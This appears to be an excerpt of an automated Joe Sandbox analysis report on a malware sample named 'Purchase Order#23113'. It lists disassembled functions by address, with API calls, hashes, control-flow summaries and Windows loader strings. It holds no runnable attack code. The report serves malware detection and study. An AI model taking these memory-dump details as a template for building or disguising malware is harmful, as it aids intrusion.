                                                                            • Opcode ID: b74eed2e12b9ae23d1944d7d830ec95a847a6aa102ab34ec24e9c64c1602b016
                                                                            • Instruction ID: 354e26ebc23225eb111b90b9d237a2985e34ff8076f3344505dcbd16314de1af
                                                                            • Opcode Fuzzy Hash: b74eed2e12b9ae23d1944d7d830ec95a847a6aa102ab34ec24e9c64c1602b016
                                                                            • Instruction Fuzzy Hash: 1390022164540502D20171584444616900B97D0351FD5C032A1024569ECA258B92A233
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00409AB0 Relevance: .1, Instructions: 92COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                                            • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                                                            • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                                            • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 6 41a630-41a661 call 41af60 RtlAllocateHeap
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID: 6EA
                                                                            • API String ID: 1279760036-1400015478
                                                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                            • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                            • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00408308 Relevance: 1.6, APIs: 1, Instructions: 56threadwindowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 219 408308-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 228 40835c-40836e PostThreadMessageW 219->228 229 40838e-408392 219->229 230 408370-40838a call 40a480 228->230 231 40838d 228->231 230->231 231->229
                                                                            APIs
                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID:
                                                                            • API String ID: 1836367815-0
                                                                            • Opcode ID: 3652f5063e7420592e5ed941896d8be1a842ecbfb45ce89cbd134adf593fc7ce
                                                                            • Instruction ID: 03cb6314e5724dbbfdddbc1813a237f8b63e8bde2db8bf04119014b41ccd526d
                                                                            • Opcode Fuzzy Hash: 3652f5063e7420592e5ed941896d8be1a842ecbfb45ce89cbd134adf593fc7ce
                                                                            • Instruction Fuzzy Hash: 8401B531A8032877E721A6959C42FEE762C6B40F55F04011AFF04BA1C2EAE9690546EA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 234 408310-40831f 235 408328-40835a call 41ca00 call 40acf0 call 414e50 234->235 236 408323 call 41be60 234->236 243 40835c-40836e PostThreadMessageW 235->243 244 40838e-408392 235->244 236->235 245 408370-40838a call 40a480 243->245 246 40838d 243->246 245->246 246->244
                                                                            APIs
                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID:
                                                                            • API String ID: 1836367815-0
                                                                            • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                                            • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                                                            • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                                            • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041A7C2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 273 41a7c2-41a7ea call 41af60 275 41a7ef-41a804 LookupPrivilegeValueW 273->275
                                                                            APIs
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LookupPrivilegeValue
                                                                            • String ID:
                                                                            • API String ID: 3899507212-0
                                                                            • Opcode ID: c2bf0afcd6b210e6050da096542cf81bb09f150e42e767c5e43b5e2650d02e06
                                                                            • Instruction ID: 6b2e5c613ef55a6df0f55c5fb8cdc32da47c137495a01ec00b15de7221719f23
                                                                            • Opcode Fuzzy Hash: c2bf0afcd6b210e6050da096542cf81bb09f150e42e767c5e43b5e2650d02e06
                                                                            • Instruction Fuzzy Hash: 73F0EDB5201259AFCB10DF48CC84FD7BBA8EF88654F108198FE0C5B242CA30A851CBF1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041A66A Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 276 41a66a-41a687 call 41af60 278 41a68c-41a6a1 RtlFreeHeap 276->278
                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID:
                                                                            • API String ID: 3298025750-0
                                                                            • Opcode ID: 0f6725eb35f52b3fdc17333689a778d032c8229e468558adea3ffab8edd294ea
                                                                            • Instruction ID: 7843ae0af5eb49ce608649b451d0fbbf040d2ecdec55f49cadfe4ccedadb182e
                                                                            • Opcode Fuzzy Hash: 0f6725eb35f52b3fdc17333689a778d032c8229e468558adea3ffab8edd294ea
                                                                            • Instruction Fuzzy Hash: C3E04FB52002046FD714DF59CC84EEB37AAEF88354F158559FA1C97252C631E911CBB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 279 41a670-41a686 280 41a68c-41a6a1 RtlFreeHeap 279->280 281 41a687 call 41af60 279->281 281->280
                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID:
                                                                            • API String ID: 3298025750-0
                                                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                            • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                            • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LookupPrivilegeValue
                                                                            • String ID:
                                                                            • API String ID: 3899507212-0
                                                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                            • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                            • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041A6A2 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExitProcess
                                                                            • String ID:
                                                                            • API String ID: 621844428-0
                                                                            • Opcode ID: bdf861d4c4c428965906b4d703dc43911d27af3f5feaa706c1122f1b340ec4e5
                                                                            • Instruction ID: 004607ab2a9e9a6b3538d07686916e66172f62f4b7a9503426b8375871ffdb93
                                                                            • Opcode Fuzzy Hash: bdf861d4c4c428965906b4d703dc43911d27af3f5feaa706c1122f1b340ec4e5
                                                                            • Instruction Fuzzy Hash: 76E08671645244BBD720DB58CC84ED33F66DF59250F19C15AB94EAB751C930D901C7A1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041A6B0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExitProcess
                                                                            • String ID:
                                                                            • API String ID: 621844428-0
                                                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                            • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                            • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01772C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 6575b6a84f96634bcab2904b3970ac6f48dc01f298106a71029f58955a9f8f03
                                                                            • Instruction ID: 7fe65e61980c790fdd4b1a34f6346f066874f608441069daf3ea2630a6eb2d2c
                                                                            • Opcode Fuzzy Hash: 6575b6a84f96634bcab2904b3970ac6f48dc01f298106a71029f58955a9f8f03
                                                                            • Instruction Fuzzy Hash: D3B04C719455C585DB11A7644608616B9056790711F55C461D2120655B47288191E276
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 017B2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-2160512332
                                                                            • Opcode ID: 54dc8d8750f8f93644b042d4546975076c62fc053ef43edcbeae31529eb57e9c
                                                                            • Instruction ID: 99df3b53211d3110d2a0f49f17bfdf4674f7031a13b9f40ef0d4e118e72fe0a1
                                                                            • Opcode Fuzzy Hash: 54dc8d8750f8f93644b042d4546975076c62fc053ef43edcbeae31529eb57e9c
                                                                            • Instruction Fuzzy Hash: 37928F71609742AFE721DF28C884BABF7E8BB88754F04492DFA94D7252D770E844CB52
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01768620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017A54CE
                                                                            • Thread identifier, xrefs: 017A553A
                                                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017A540A, 017A5496, 017A5519
                                                                            • Critical section address, xrefs: 017A5425, 017A54BC, 017A5534
                                                                            • 8, xrefs: 017A52E3
                                                                            • Invalid debug info address of this critical section, xrefs: 017A54B6
                                                                            • Critical section address., xrefs: 017A5502
                                                                            • corrupted critical section, xrefs: 017A54C2
                                                                            • Address of the debug info found in the active list., xrefs: 017A54AE, 017A54FA
                                                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017A54E2
                                                                            • double initialized or corrupted critical section, xrefs: 017A5508
                                                                            • undeleted critical section in freed memory, xrefs: 017A542B
                                                                            • Critical section debug info address, xrefs: 017A541F, 017A552E
                                                                            • Thread is in a state in which it cannot own a critical section, xrefs: 017A5543
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                            • API String ID: 0-2368682639
                                                                            • Opcode ID: 958ccb85619642552943df4208f6550a26c90799a88a150a013a9e60b7ba59a4
                                                                            • Instruction ID: f32b1a927204cf677fd89d60692bda691fb6cd9bf609df1d862a57d6ade333b3
                                                                            • Opcode Fuzzy Hash: 958ccb85619642552943df4208f6550a26c90799a88a150a013a9e60b7ba59a4
                                                                            • Instruction Fuzzy Hash: 9681BDB0A40358EFDB20CF99C895BAEFBB9FB48B04F644259F904B7241D375A941CB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017629F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 017A2624
                                                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 017A2506
                                                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 017A2412
                                                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 017A261F
                                                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017A24C0
                                                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 017A2498
                                                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 017A2409
                                                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 017A2602
                                                                            • @, xrefs: 017A259B
                                                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017A22E4
                                                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017A25EB
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                            • API String ID: 0-4009184096
                                                                            • Opcode ID: 0c629e0c7d23a55adf6a79990b19d208256e9ef7cfb4445f46e64001f8bc9791
                                                                            • Instruction ID: 2ad09adaf471c9177c6007789209febafa29952d00ab99ef055ce9a0a7b660b3
                                                                            • Opcode Fuzzy Hash: 0c629e0c7d23a55adf6a79990b19d208256e9ef7cfb4445f46e64001f8bc9791
                                                                            • Instruction Fuzzy Hash: 580260F1D042299FDB61DB58CC84BD9F7B8AF54704F4041EAEA09A7246EB309E84CF59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017D8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                            • API String ID: 0-2515994595
                                                                            • Opcode ID: cdb41ab25756f40adc571fa70da0b825345937b8b6efad803b5f9ad33b789c13
                                                                            • Instruction ID: 0d18d2d492c18af44e0c4f2dfe6155ea2fdfaae2242e02b77eb54663a6e16dce
                                                                            • Opcode Fuzzy Hash: cdb41ab25756f40adc571fa70da0b825345937b8b6efad803b5f9ad33b789c13
                                                                            • Instruction Fuzzy Hash: F751B1B15043499BD72ACF188848BABFBFCEF98240F14496DE999C3285E770D644C7A3
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017E0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                            • API String ID: 0-1700792311
                                                                            • Opcode ID: 77bee1739ba5727df444823c406e7e2c897998704e1007fa657d86f145445e4f
                                                                            • Instruction ID: e39d6498ded979dd95c65608d5cb0a959879735f34ad87a27d4144fb6c2c5f82
                                                                            • Opcode Fuzzy Hash: 77bee1739ba5727df444823c406e7e2c897998704e1007fa657d86f145445e4f
                                                                            • Instruction Fuzzy Hash: 58D1CD71604686DFDB22DFA8C458AADFBF1FF5A710F188059F8859B252C7B49942CF20
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017B89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 017B8A3D
                                                                            • AVRF: -*- final list of providers -*- , xrefs: 017B8B8F
                                                                            • VerifierDlls, xrefs: 017B8CBD
                                                                            • HandleTraces, xrefs: 017B8C8F
                                                                            • VerifierDebug, xrefs: 017B8CA5
                                                                            • VerifierFlags, xrefs: 017B8C50
                                                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 017B8A67
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                            • API String ID: 0-3223716464
                                                                            • Opcode ID: ad4d99d1dda38eb7020c0fb8495d2636eb7c4a73f61d12d984a8f9244e20a553
                                                                            • Instruction ID: 10a4b55e2e1db1d08582ee9805034e28485ca7f8c4b41ae67e9f1755c32801e1
                                                                            • Opcode Fuzzy Hash: ad4d99d1dda38eb7020c0fb8495d2636eb7c4a73f61d12d984a8f9244e20a553
                                                                            • Instruction Fuzzy Hash: 7C9126B1645312AFD722DF28C8D4BEBF7A8EB54B14F444499FA45AB284C7309E40CB96
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017663FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-792281065
                                                                            • Opcode ID: 78238a1d44d27ffe0002f717b57b70984313b6c219e9e83e607d6f657a45742b
                                                                            • Instruction ID: 8910bd41c6e0460e0325ea7e6f139ab24d685e7df5e0910dd1847fc6e4ddad1e
                                                                            • Opcode Fuzzy Hash: 78238a1d44d27ffe0002f717b57b70984313b6c219e9e83e607d6f657a45742b
                                                                            • Instruction Fuzzy Hash: A6916970B003159BDB36DF18D858BAAFBA5FB80B14F944228FE02672C5D7B59A01CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0172645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • apphelp.dll, xrefs: 01726496
                                                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01789A01
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01789A11, 01789A3A
                                                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017899ED
                                                                            • LdrpInitShimEngine, xrefs: 017899F4, 01789A07, 01789A30
                                                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01789A2A
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-204845295
                                                                            • Opcode ID: 85fc19e99c16bb7b8a89f35bb1bcd66cad3a6f6db2bff1207dbb35678ca4a04b
                                                                            • Instruction ID: aaded4cd8ebf95b62906e12fcb1336a6a7226f7f3a9f360181f9126fa65daa63
                                                                            • Opcode Fuzzy Hash: 85fc19e99c16bb7b8a89f35bb1bcd66cad3a6f6db2bff1207dbb35678ca4a04b
                                                                            • Instruction Fuzzy Hash: 8F51C1712583049FD721EF28C895BABF7E4FB84648F10492EFA8597155E730EA05CB93
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01762674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                            Download Yara Rule
                                                                            Strings
